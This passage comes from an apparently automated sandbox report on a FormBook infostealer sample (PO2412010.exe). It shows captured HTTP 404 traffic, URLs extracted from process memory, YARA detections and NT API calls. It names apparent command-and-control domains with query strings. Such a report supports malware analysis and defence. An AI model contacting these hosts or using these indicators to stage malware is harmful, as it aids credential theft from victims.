69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Dec 2024 14:17:39 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Dec 2024 14:17:41 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Dec 2024 14:17:44 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Dec 2024 14:17:47 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.25.3Date: Tue, 10 Dec 2024 14:17:54 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e cd 0e 82 30 10 84 ef 3c c5 ca 5d 16 0d c7 4d 0f f2 13 49 10 89 29 07 8f 98 d6 94 04 28 d2 a2 f1 ed 2d 70 f1 38 3b 33 df 2c ed 92 6b cc ef 55 0a 67 7e 29 a0 aa 4f 45 1e 83 bf 47 cc 53 9e 21 26 3c d9 9c 63 10 22 a6 a5 cf 3c 52 b6 ef 18 29 d9 08 27 6c 6b 3b c9 a2 30 82 52 5b c8 f4 3c 08 c2 ed e8 11 ae 21 7a 68 f1 5d 7a 07 f6 97 71 ca a3 91 71 25 61 92 af 59 1a 2b 05 d4 b7 02 50 f4 d1 88 f0 69 0c 0c 0e f9 5c 90 a0 07 b0 aa 35 60 e4 f4 96 53 40 38 ba 36 ae 60 b7 b2 3c e4 fd 00 14 26 9a 9b cb 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b3M0<]MI)(-p8;3,kUg~)OEGS!&<c"<R)'lk;0R[<!zh]zqq%aY+Pi\5`S@86`<&0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.25.3Date: Tue, 10 Dec 2024 14:17:57 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e cd 0e 82 30 10 84 ef 3c c5 ca 5d 16 0d c7 4d 0f f2 13 49 10 89 29 07 8f 98 d6 94 04 28 d2 a2 f1 ed 2d 70 f1 38 3b 33 df 2c ed 92 6b cc ef 55 0a 67 7e 29 a0 aa 4f 45 1e 83 bf 47 cc 53 9e 21 26 3c d9 9c 63 10 22 a6 a5 cf 3c 52 b6 ef 18 29 d9 08 27 6c 6b 3b c9 a2 30 82 52 5b c8 f4 3c 08 c2 ed e8 11 ae 21 7a 68 f1 5d 7a 07 f6 97 71 ca a3 91 71 25 61 92 af 59 1a 2b 05 d4 b7 02 50 f4 d1 88 f0 69 0c 0c 0e f9 5c 90 a0 07 b0 aa 35 60 e4 f4 96 53 40 38 ba 36 ae 60 b7 b2 3c e4 fd 00 14 26 9a 9b cb 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b3M0<]MI)(-p8;3,kUg~)OEGS!&<c"<R)'lk;0R[<!zh]zqq%aY+Pi\5`S@86`<&0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.25.3Date: Tue, 10 Dec 2024 14:17:59 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e cd 0e 82 30 10 84 ef 3c c5 ca 5d 16 0d c7 4d 0f f2 13 49 10 89 29 07 8f 98 d6 94 04 28 d2 a2 f1 ed 2d 70 f1 38 3b 33 df 2c ed 92 6b cc ef 55 0a 67 7e 29 a0 aa 4f 45 1e 83 bf 47 cc 53 9e 21 26 3c d9 9c 63 10 22 a6 a5 cf 3c 52 b6 ef 18 29 d9 08 27 6c 6b 3b c9 a2 30 82 52 5b c8 f4 3c 08 c2 ed e8 11 ae 21 7a 68 f1 5d 7a 07 f6 97 71 ca a3 91 71 25 61 92 af 59 1a 2b 05 d4 b7 02 50 f4 d1 88 f0 69 0c 0c 0e f9 5c 90 a0 07 b0 aa 35 60 e4 f4 96 53 40 38 ba 36 ae 60 b7 b2 3c e4 fd 00 14 26 9a 9b cb 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b3M0<]MI)(-p8;3,kUg~)OEGS!&<c"<R)'lk;0R[<!zh]zqq%aY+Pi\5`S@86`<&0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.25.3Date: Tue, 10 Dec 2024 14:18:02 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 203Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 6d 34 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dm4p/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=iso-8859-1content-length: 196date: Tue, 10 Dec 2024 14:18:12 GMTserver: LiteSpeedx-tuned-by: N0Cconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=iso-8859-1content-length: 196date: Tue, 10 Dec 2024 14:18:15 GMTserver: LiteSpeedx-tuned-by: N0Cconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=iso-8859-1content-length: 196date: Tue, 10 Dec 2024 14:18:18 GMTserver: LiteSpeedx-tuned-by: N0Cconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: PO2412010.exe, 00000000.00000002.1432296932.0000000002631000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: duvyEsVvTpq.exe, 00000009.00000002.3835836980.0000000003BA8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.madhf.tech/6ou6/?Gn6D=5fNLN8qhqB3P&x2q=We72k2U8RqyHNx9c0lgrcMajP
                Source: duvyEsVvTpq.exe, 00000009.00000002.3838073640.0000000005973000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.smartcongress.net
                Source: duvyEsVvTpq.exe, 00000009.00000002.3838073640.0000000005973000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.smartcongress.net/qtfx/
                Source: isoburn.exe, 00000006.00000002.3839590417.0000000007828000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: isoburn.exe, 00000006.00000002.3839590417.0000000007828000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: isoburn.exe, 00000006.00000002.3839590417.0000000007828000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: isoburn.exe, 00000006.00000002.3839590417.0000000007828000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: isoburn.exe, 00000006.00000002.3839590417.0000000007828000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: isoburn.exe, 00000006.00000002.3839590417.0000000007828000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: isoburn.exe, 00000006.00000002.3839590417.0000000007828000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: isoburn.exe, 00000006.00000002.3832319605.0000000002909000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?
                Source: isoburn.exe, 00000006.00000002.3832319605.0000000002909000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: isoburn.exe, 00000006.00000002.3832319605.0000000002909000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: isoburn.exe, 00000006.00000003.1998564179.0000000007812000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: isoburn.exe, 00000006.00000002.3832319605.0000000002909000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: isoburn.exe, 00000006.00000002.3832319605.0000000002909000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=10332
                Source: isoburn.exe, 00000006.00000002.3832319605.0000000002909000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033h
                Source: isoburn.exe, 00000006.00000002.3832319605.0000000002909000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033l
                Source: isoburn.exe, 00000006.00000002.3832319605.0000000002909000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: isoburn.exe, 00000006.00000002.3832319605.0000000002909000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: isoburn.exe, 00000006.00000002.3837163739.00000000051C6000.00000004.10000000.00040000.00000000.sdmp, duvyEsVvTpq.exe, 00000009.00000002.3835836980.0000000003A16000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.cstrategy.online/qx5d/?x2q=IyUQrkKyuirfHSYtNcNb8FX1VMdObdd7C0LSkI7uCAGWAT/RC
                Source: isoburn.exe, 00000006.00000002.3839590417.0000000007828000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 3.2.PO2412010.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.PO2412010.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.1811060846.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3828928814.0000000002620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3835997745.00000000043F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1811863251.0000000001980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3835510963.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3838073640.00000000058D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3835472145.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1813283788.0000000001F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_0042C663 NtClose,3_2_0042C663
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AC2B60 NtClose,LdrInitializeThunk,3_2_01AC2B60
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AC2DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_01AC2DF0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AC2C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_01AC2C70
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AC35C0 NtCreateMutant,LdrInitializeThunk,3_2_01AC35C0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AC4340 NtSetContextThread,3_2_01AC4340
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AC4650 NtSuspendThread,3_2_01AC4650
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AC2BA0 NtEnumerateValueKey,3_2_01AC2BA0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AC2B80 NtQueryInformationFile,3_2_01AC2B80
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AC2BE0 NtQueryValueKey,3_2_01AC2BE0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AC2BF0 NtAllocateVirtualMemory,3_2_01AC2BF0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AC2AB0 NtWaitForSingleObject,3_2_01AC2AB0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AC2AF0 NtWriteFile,3_2_01AC2AF0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AC2AD0 NtReadFile,3_2_01AC2AD0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AC2DB0 NtEnumerateKey,3_2_01AC2DB0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AC2DD0 NtDelayExecution,3_2_01AC2DD0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AC2D30 NtUnmapViewOfSection,3_2_01AC2D30
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AC2D00 NtSetInformationFile,3_2_01AC2D00
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AC2D10 NtMapViewOfSection,3_2_01AC2D10
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AC2CA0 NtQueryInformationToken,3_2_01AC2CA0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AC2CF0 NtOpenProcess,3_2_01AC2CF0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AC2CC0 NtQueryVirtualMemory,3_2_01AC2CC0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AC2C00 NtQueryInformationProcess,3_2_01AC2C00
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AC2C60 NtCreateKey,3_2_01AC2C60
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AC2FA0 NtQuerySection,3_2_01AC2FA0
